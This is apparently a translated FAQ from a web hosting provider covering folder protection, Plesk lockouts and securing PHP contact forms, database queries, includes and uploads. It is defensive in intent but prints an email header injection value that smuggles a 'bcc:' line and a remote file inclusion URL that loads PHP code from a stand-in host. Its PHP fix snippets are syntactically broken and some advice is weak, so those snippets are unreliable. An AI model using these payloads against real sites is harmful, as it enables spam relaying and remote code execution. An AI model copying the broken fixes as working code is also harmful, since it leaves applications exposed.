Frequently Asked Questions

Log into your Control Panel, go to the website where you want to protect a folder.

Click on the "Directories". Click on "Add new directory". Enter the name of the folder, and choose a text to be displayed at login. Click OK.

Then click "Add new user" to create a user. Of course it is possible to create multiple users!

The files you wish to protect can then be put in the folder you specified!
Lately, it happens more often that there is abuse of standard contact forms. An example:

A contact consists of the fields:
  • Name (1 line)
  • Email address (1 line)
  • Subject (1 line)
  • Message (multiline).

    The "Subject" field will appear in the subject. An example of a PHP command to send mail from this form may look like this:

    mail ("info@mywebsite.com", $subject, $message);

    The headers of this email will then look like this:
    To: info@mywebsite.com
    Subject: $subject


    With spam form injection the subject is introduced as follows:
    subject=This is the subject \\nbcc: test@test.com

    The headers will then look like this:
    To: info@mywebsite.com
    Subject: This is the subject
    bcc: test@test.com

    This email is then sent not only to info@mywebsite.com but also to test@test.com and possibly multiple addresses entered.

    We would therefore ask everyone to make sure to protect their contact form. A good plan to use this counter is to check the characters \\n and \\r when the field should not consist of more than one line.

    Example:
    $subject = str_replace ("\\r\\n '','''', $_POST [''subject'']);
  • Make sure when inserting texts that could be changed by the visitor, the variable is between '.
    example:
    $result = mysql_query ("INSERT INTO table (id, text) VALUES ('', '' mysql_real_escape_string ($text) '').".)

    If you don't do this, the visitor can customize the query by putting a 'in the text and then start a new query.
    If within 3 minutes you have more than 5 wrong attempts to log into Plesk, you will be locked out for 30 minutes. After 30 minutes you can try again.

    No time to wait? Please contact us.
    Because in many standard scripts (eg. Joomla) exploits are possible where external code can be executed to cause damage, we have decided to disallow to open files from other Web sites from PHP. This applies to the following commands:
  • fopen
  • include
  • requirement
  • include_once
  • require_once
  • file

    Of course there are plenty of reasons your website might need to load files from external webservers. If your web site also requires this,
    Many people load pages by using a template and load it to a file.
    EG: index.php page = voorpagina.php?

    The file "voorpagina.php" is then loaded through an include.

    Do not do this! By filling in: index.php?page=http: //www.test.com/phpcode.php can allow the user to perform remote code through your script, this is very dangerous!

    It is better to work with a header and footer, but if this is not appropriate, it is better to check if the file is on the current server, for example to see if there is a ":" in the $page variable.
  • If you allow visitors to upload files, you must make sure that no malicious PHP and other code can be uploaded.

    Therefore, check the file extension of the file that is uploaded, so for example .php is not possible!